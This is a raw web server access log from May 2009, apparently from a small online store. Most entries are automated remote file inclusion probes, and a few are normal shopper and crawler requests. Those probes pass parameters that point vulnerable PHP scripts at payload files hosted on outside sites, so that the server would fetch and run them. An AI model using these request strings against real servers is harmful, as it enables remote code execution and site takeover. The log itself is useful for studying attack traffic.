67.19.228.18 - - [20/May/2009:06:00:05 -0400] "GET /logs/error_log.Q108112100///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
67.19.228.18 - - [20/May/2009:06:00:06 -0400] "GET /logs/error_log.Q108112100///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.810"
69.237.82.158 - - [20/May/2009:06:00:13 -0400] "GET /logs//update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
69.237.82.158 - - [20/May/2009:06:00:14 -0400] "GET //update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:06:00:23 -0400] "GET //update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:06:00:23 -0400] "GET /logs//update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:01:05 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:01:05 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.108.85.158 - - [20/May/2009:06:01:11 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:01:12 -0400] "GET //update/update5.php?lang=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:01:12 -0400] "GET /logs//update/update5.php?lang=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
65.23.158.226 - - [20/May/2009:06:01:24 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:01:24 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
91.121.210.42 - - [20/May/2009:06:01:26 -0400] "GET /logs/access_log.Q108111500/inc/cmses/aedatingCMS.php?dir[inc]=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:01:26 -0400] "GET /logs/access_log.Q109050700//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
65.23.158.226 - - [20/May/2009:06:01:26 -0400] "GET /logs/access_log.Q109011400//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:06:02:14 -0400] "GET /logs/access_log.Q108090200%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:06:02:14 -0400] "GET /logs/access_log.Q108101000%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.59.178 - - [20/May/2009:06:02:16 -0400] "GET /logs/access_log.Q109042600/scanhttp://h1.ripway.com/gale232/hs.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
65.98.59.178 - - [20/May/2009:06:02:16 -0400] "GET /scanhttp://h1.ripway.com/gale232/hs.txt??? HTTP/1.1" 404 237 "-" "libwww-perl/5.811"
65.98.59.178 - - [20/May/2009:06:02:16 -0400] "GET /logs/scanhttp://h1.ripway.com/gale232/hs.txt??? HTTP/1.1" 404 242 "-" "libwww-perl/5.811"
65.98.59.178 - - [20/May/2009:06:02:27 -0400] "GET /logs/access_log.Q108090500/scanhttp://h1.ripway.com/gale232/hs.txt??? HTTP/1.1" 404 264 "-" "libwww-perl/5.811"
220.181.7.97 - - [20/May/2009:06:02:34 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
121.169.189.112 - - [20/May/2009:06:03:05 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0005044F44B1C1003A2D053+M37+ENG HTTP/1.1" 200 76518 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L000504444B119100306D053+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:06:03:09 -0400] "GET /images/cat_dot.gif HTTP/1.1" 200 45 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0005044F44B1C1003A2D053+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:06:03:09 -0400] "GET /images/cat_expand.gif HTTP/1.1" 200 79 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0005044F44B1C1003A2D053+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:06:03:09 -0400] "GET /images/cat_link.gif HTTP/1.1" 200 46 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0005044F44B1C1003A2D053+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
110.45.144.106 - - [20/May/2009:06:03:13 -0400] "GET /logs/access_log.Q108062400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:03:13 -0400] "GET /logs/access_log.Q108060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
121.169.189.112 - - [20/May/2009:06:03:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0005044F44B1C1003A2D053+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
222.122.26.5 - - [20/May/2009:06:03:14 -0400] "GET /logs/access_log.Q109011400%20%20/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
121.169.189.112 - - [20/May/2009:06:03:15 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L0005084C47716100CABD055+M37+ENG HTTP/1.1" 200 48087 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:06:03:18 -0400] "GET /images/space.gif HTTP/1.1" 200 43 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0005084C47716100CABD055+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
121.169.189.112 - - [20/May/2009:06:03:18 -0400] "GET /images/pf-a.gif HTTP/1.1" 200 798 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L0005084C47716100CABD055+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.65 Safari/525.19"
110.45.144.106 - - [20/May/2009:06:03:25 -0400] "GET /logs/access_log.Q108062400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:03:25 -0400] "GET /logs/access_log.Q108060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.108.85.158 - - [20/May/2009:06:03:28 -0400] "GET /logs/error_log.Q108032500//update/update5.php?lang=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 243 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:03:29 -0400] "GET //update/update5.php?lang=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
89.108.85.158 - - [20/May/2009:06:03:29 -0400] "GET /logs//update/update5.php?lang=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 222 "-" "libwww-perl/5.803"
209.59.12.99 - - [20/May/2009:06:03:31 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
110.45.144.106 - - [20/May/2009:06:03:41 -0400] "GET /logs/access_log.Q108062400/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:03:41 -0400] "GET /logs/access_log.Q108060200/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
89.108.85.158 - - [20/May/2009:06:03:44 -0400] "GET //update/update5.php?lang=http://indoirc.go.ro/idrou.txt? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
123.125.64.38 - - [20/May/2009:06:03:45 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.98.80.2 - - [20/May/2009:06:04:00 -0400] "GET /logs/access_log.Q108112700/index2.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:00 -0400] "GET /index2.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:00 -0400] "GET /logs/index2.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /logs/access_log.Q108112700/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /logs/access_log.Q108112700/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /logs/access_log.Q108112700/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /logs/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /logs/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:01 -0400] "GET /logs/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:08 -0400] "GET /logs/error_log.Q109050700/index2.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
89.108.85.158 - - [20/May/2009:06:04:18 -0400] "GET //update/update5.php?lang=http://www.frenkel.ru/cms/admin/mc.txt??? HTTP/1.1" 404 217 "-" "libwww-perl/5.803"
200.93.147.154 - - [20/May/2009:06:04:33 -0400] "GET /logs/access_log.Q109042600/scanhttp://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
200.93.147.154 - - [20/May/2009:06:04:33 -0400] "GET /scanhttp://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 240 "-" "libwww-perl/5.805"
200.93.147.154 - - [20/May/2009:06:04:34 -0400] "GET /logs/scanhttp://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 245 "-" "libwww-perl/5.805"
124.217.216.86 - - [20/May/2009:06:04:35 -0400] "GET /logs/access_log.Q108090400//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.826"
124.217.216.86 - - [20/May/2009:06:04:35 -0400] "GET //sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.826"
124.217.216.86 - - [20/May/2009:06:04:35 -0400] "GET /logs//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 258 "-" "libwww-perl/5.826"
65.98.80.2 - - [20/May/2009:06:04:43 -0400] "GET /logs/error_log.Q109013100/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:43 -0400] "GET /logs/error_log.Q109013100/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:04:43 -0400] "GET /logs/error_log.Q109013100/index.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
200.93.147.154 - - [20/May/2009:06:04:46 -0400] "GET /logs/access_log.Q108090500/scanhttp://h1.ripway.com/yuni212/cinta.txt??? HTTP/1.1" 404 267 "-" "libwww-perl/5.805"
222.122.26.5 - - [20/May/2009:06:05:02 -0400] "GET /logs/access_log.Q108102400/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
174.34.129.58 - - [20/May/2009:06:05:07 -0400] "GET /logs/access_log.Q108112700/index2.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:05:07 -0400] "GET /index2.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:05:07 -0400] "GET /logs/access_log.Q109050300/index2.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 235 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:05:08 -0400] "GET /logs/index2.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 213 "-" "libwww-perl/5.820"
64.251.32.254 - - [20/May/2009:06:05:13 -0400] "GET /images/monthly_specials.jpg HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)"
222.122.26.5 - - [20/May/2009:06:05:14 -0400] "GET /logs/access_log.Q109011400/ncaster/admin/addons/archive/archive.php?adminfolder=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
218.249.36.194 - - [20/May/2009:06:05:16 -0400] "GET /logs/access_log.Q109020100%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.80.2 - - [20/May/2009:06:05:33 -0400] "GET /logs/access_log.Q108112700/test.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 233 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:05:33 -0400] "GET /test.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:05:33 -0400] "GET /logs/test.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
124.217.216.86 - - [20/May/2009:06:05:41 -0400] "GET /logs/access_log.Q109051100//sohoadmin/program/modules/mods_full/includes/login.php?_SESSION[docroot_path]=http://sherif-dudulz.ucoz.com/osiris.txt??? HTTP/1.1" 404 280 "-" "libwww-perl/5.826"
217.147.29.190 - - [20/May/2009:06:05:58 -0400] "GET /logs/access_log.Q108112400/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.qdgymx.com/website/administrator/components/com_remository/fx29id1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
67.19.228.18 - - [20/May/2009:06:06:03 -0400] "GET /logs/error_log.Q108112100%20///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
65.98.80.2 - - [20/May/2009:06:06:03 -0400] "GET /logs/error_log.Q109013100/test.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
62.141.54.240 - - [20/May/2009:06:06:04 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:06:06:04 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:06:06:04 -0400] "GET /logs/access_log.Q108090100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.34.129.58 - - [20/May/2009:06:06:09 -0400] "GET /test.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 206 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:06:09 -0400] "GET /logs/test.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 211 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:06:09 -0400] "GET /logs/access_log.Q109050300/test.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.820"
174.34.129.58 - - [20/May/2009:06:06:11 -0400] "GET /logs/access_log.Q108112700/test.php?fileExtension=http://www.rotaryamazonia.com/galeria2/drivid.txt?? HTTP/1.1" 404 233 "-" "libwww-perl/5.820"
67.19.228.18 - - [20/May/2009:06:06:11 -0400] "GET /logs/error_log.Q108112100%20///skin/zero_vote/setup.php?dir=http://flyozoneusa.com/tmp/rfi.txt??? HTTP/1.1" 404 251 "-" "libwww-perl/5.810"
65.98.80.2 - - [20/May/2009:06:06:15 -0400] "GET /logs/error_log.Q109013100/main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:06:15 -0400] "GET /main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:06:15 -0400] "GET /logs/main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:06:15 -0400] "GET /logs/error_log.Q109013100/main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:06:15 -0400] "GET /main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 206 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:06:15 -0400] "GET /logs/main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 211 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:06:16 -0400] "GET /logs/error_log.Q108120200/main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
65.98.80.2 - - [20/May/2009:06:06:16 -0400] "GET /logs/error_log.Q108120200/main.php?fileExtension=http://www.bsdhz.ch//assets/media/Roseid.txtt? HTTP/1.1" 404 232 "-" "libwww-perl/5.79"
218.249.36.194 - - [20/May/2009:06:06:28 -0400] "GET /logs/access_log.Q109011400%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.72.114 - - [20/May/2009:06:06:31 -0400] "GET /images/over-store_syringe_section.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
62.141.54.240 - - [20/May/2009:06:06:48 -0400] "GET /logs/access_log.Q108110900//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.93.147.154 - - [20/May/2009:06:06:54 -0400] "GET /scanhttp://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 240 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
200.93.147.154 - - [20/May/2009:06:06:54 -0400] "GET /logs/access_log.Q109042600/scanhttp://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
200.93.147.154 - - [20/May/2009:06:06:54 -0400] "GET /logs/access_log.Q108090500/scanhttp://h1.ripway.com/yuni212/andri.txt??? HTTP/1.1" 404 267 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
62.141.54.240 - - [20/May/2009:06:07:09 -0400] "GET /logs/access_log.Q108090100//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:06:07:09 -0400] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:06:07:09 -0400] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
62.141.54.240 - - [20/May/2009:06:07:36 -0400] "GET /logs/access_log.Q108110900//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.geocities.com/bozot87/irc/1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:06:07:51 -0400] "GET //update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
121.165.73.157 - - [20/May/2009:06:07:51 -0400] "GET /logs//update/update5.php?lang=http://www.babywhisperer.com/default/FX29ID1.txt? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:17 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:17 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:17 -0400] "GET /logs/access_log.Q108110900//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:18 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:18 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:18 -0400] "GET /logs/access_log.Q108110900//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:20 -0400] "GET //modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:20 -0400] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
110.45.144.106 - - [20/May/2009:06:08:20 -0400] "GET /logs/access_log.Q108110900//modules/TotalCalendar/about.php?inc_dir=http://shw.or.kr/bbs/bbs_public/06notice/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
209.59.12.99 - - [20/May/2009:06:08:32 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.98.5 - - [20/May/2009:06:08:41 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:08:41 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
123.143.98.5 - - [20/May/2009:06:08:41 -0400] "GET /logs/access_log.Q108090400//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://wareagleracing.com/forum/impex/fx29id1.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
